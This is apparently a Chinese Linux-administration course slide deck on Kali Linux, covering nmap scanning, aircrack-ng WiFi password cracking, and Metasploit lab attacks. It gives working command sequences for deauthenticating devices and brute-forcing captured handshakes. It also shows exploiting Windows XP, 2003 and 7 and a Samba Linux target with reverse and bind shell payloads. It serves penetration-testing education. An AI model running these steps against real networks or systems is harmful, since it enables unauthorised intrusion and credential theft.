《linux服务器配置与管理》课件15-任务十五 KALI操作系统的配置和使用

任务十五：KALI操作系统的配置和使用15.1任务资讯15.1.1任务描述某单位在网络安全检查中，需要使用KALI操作系统，用于网络安全检测及调查取证。系统管理员在使用KALI过程中，需要使用安全漏洞检测工具以及无线安全工具检验密码强度及系统的强壮性。

15.1.2任务目标工作任务KALI服务器的安全工具使用学习目标掌握KALI服务器的安全工具使用实践技能1.学习NMAP安全工具2.学习aircrack安全工具破解wifi密码3.学习安全漏洞检测工具攻击windowsXP攻击windows20034.使用安全漏洞检测工具攻击LINUX靶机攻击windows7知识要点1.学习NMAP安全工具2.学习aircrack安全工具破解wifi密码3.学习安全漏洞检测工具攻击windowsXP、windows20034.使用安全漏洞检测工具攻击LINUX、windows715.2决策指导1.无线网络检测2.渗透测试软件检测操作系统安全15.3制定计划KaliLinux预装了许多渗透测试软件，包括nmap、Wireshark、JohntheRipper，以及Aircrack-ng等。01-InformationGathering（信息收集）02-VulnerabilityAssessment（弱点评估）03-WebApplicationAnalysis（Web应用程序分析）04-DatabaseAssessment（数据库评估）05-PasswordAttacks（密码攻击）06-WirelessAttacks（无线攻击）07-ReverseEngineering（逆向工程）08-ExploitationTools（渗透工具）09-Sniffing&Spoofing（嗅探和欺骗）10-PostExploitation（渗透以后）11-Forensics（取证工具）12-ReportingTools（报告工具）13-SocialEngineeringTools（社会工程工具）14-SystemServices（系统服务）Usualapplications（常用应用）15.4任务实施15.4.1学习NMAP安全工具1.在Kali系统上可以开启SSH服务2．字典生成软件crunch3．NMAP工具软件Nmap常用

参数参

数说

明-sPping扫描，Nmap在扫描端口时，默认都会使用ping扫描-sL简单列表扫描-sn使用PING主机方式-sV监测端口服务版本操作系统信息主机名等-sS半开扫描-sTTCP方式扫描，会在目标主机的日志中记录大批连接请求和错误信息。-sUUDP扫描，UDP扫描是不可靠的-sA这项高级的扫描方法通常用来穿过防火墙的规则集-sF-sN秘密FIN数据包扫描、XmasTree、Null扫描模式-sC脚本扫描-A全面系统检测、启用脚本检测、扫描等-O启用远程操作系统检测，但可能存在误报-V-v-v显示扫描过程，推荐使用-PN扫描之前不使用ping命令-p指定端口，如“1-65535、1433、135、22、80、3389”等-h帮助文档-T4针对TCP端口禁止动态扫描延迟超过10ms设置时间模板-iL读取主机列表，“-iLD:\iplist.txt”-oN-oX-oG将报告写入文件，分别是正常、XML、grepable三种格式-traceroute路由跟踪扫描--script按照脚本分类进行扫描-6开启IPv6扫描举例（1）扫描指定IP所开放的端口：nmap-sS-p1-65535-v举例（2）扫描C段存活主机：nmap-sP/24举例（3）指定端口扫描：nmap-p80,1433,22,1521举例（4）探测主机操作系统：nmap-o举例（5）全面的系统探测：nmap-v-A（nmap默认扫描主机1000个高危端口）举例（6）探测指定网段：nmap-10举例（7）穿透防火墙进行扫描：nmap-Pn-A（禁止用ping的）举例（8）使用脚本，扫描Web敏感目录：nmap-p80--script=http-enum.nse15.4.2学习aircrack安全工具破解wifi密码1．需要环境2．所需要命令(1)airmon-ng #命令检查网卡是否支持监听模式，使用airmon-ngcheckkill命令关闭无关进程(2)airmon-ngstartwlan0 #开启无线网卡的监听模式，使用iwconfig命令确认网卡为监听模式(3)airodump-ngwlan0mon #搜索周围的WiFi网络(4)airodump-ng-c10--bssid00:27:19:4C:3F:6C-w90AB.capwlan0mon #抓取无线数据包(5)aireplay-ng-020-a00:27:19:4C:3F:6C-c7C:B2:32:1F:A9:0Ewlan0mon #攻击已连接设备airodump-ng-c1--bssid00:27:19:6F:26:04-w2604wlan0monaireplay-ng-05-a00:27:19:6F:26:04-cA8:88:08:3f:AE:11wlan0mon(6)airmon-ngstopwlan0mon #停止抓包结束无线网卡的监听模式(7)aircrack-ng-a2-b00:27:19:4C:3F:6C-w/usr/share/wordlist/rockyou.txt3F6C.cap #暴力破解指定文件包aircrack-ng-a2-b00:27:19:6F:26:04-wdie.txt2604其他可能用到的命令：ifconfig、iwconfig、airmon-ngcheckkill。暴力破解步骤开启网关监听模式确认网卡模式、扫描WIFI热点抓取握手包、强制设备重连抓取到握手包、结束监听模式获得WIFI密码15.4.3学习安全漏洞检测工具攻击windowsXP1.Metasploit工具Metasploit工具一般攻击的过程：（1）获得EIP指令寄存器。（2）插入shellcode代码或填充数据获取权限。（3）反向连接shell。即将目标主机当做服务，攻击者机器作为客户端。（4）添加用户或进行其它操作。首先利用扫描器的插件探测目标系统的安全漏洞查找适用模块选择08-067模块配置模块、渗透成功执行命令：ps查看目标主机进程从控制端添加用户hack3.渗透实操：攻击windows2003useexploit/Windows/smb/ms08_067_netapisetpayloadwindows/meterpreter/reverse_tcpsetRHOST38setLHOST37settarget3配置参数、成功获取session通过远程桌面登录4.渗透实操：攻击linux靶机命令列表searchsambauseexploit/multi/samba/usermap_scriptShowpayloadsSetpayloadcmd/unix/bind_netcatShowoptionssetRHOST07exploit查找攻击Samba的模块选择模块、设定攻击载荷5.渗透实操：通过10-046漏洞攻击windows7对Windows7的扫描结果漏洞选择查看参数、配置监听地址攻击载荷配置、开始攻击打开会话本小节用到的命令useexploit/windows/browser/ms10_046_shortcut_icon_dllloadersetpayloadwindows/meterpreter/reverse_tcpsetSRVHOST37setRHOST36setLHOST37评价指标及评价内容★★★★★★评价方式基本操作20分部署KALI操作系统

教师评价开启SSH学习crunch密码工具

动手做20分（重现）学习aircrack安全工具

自我评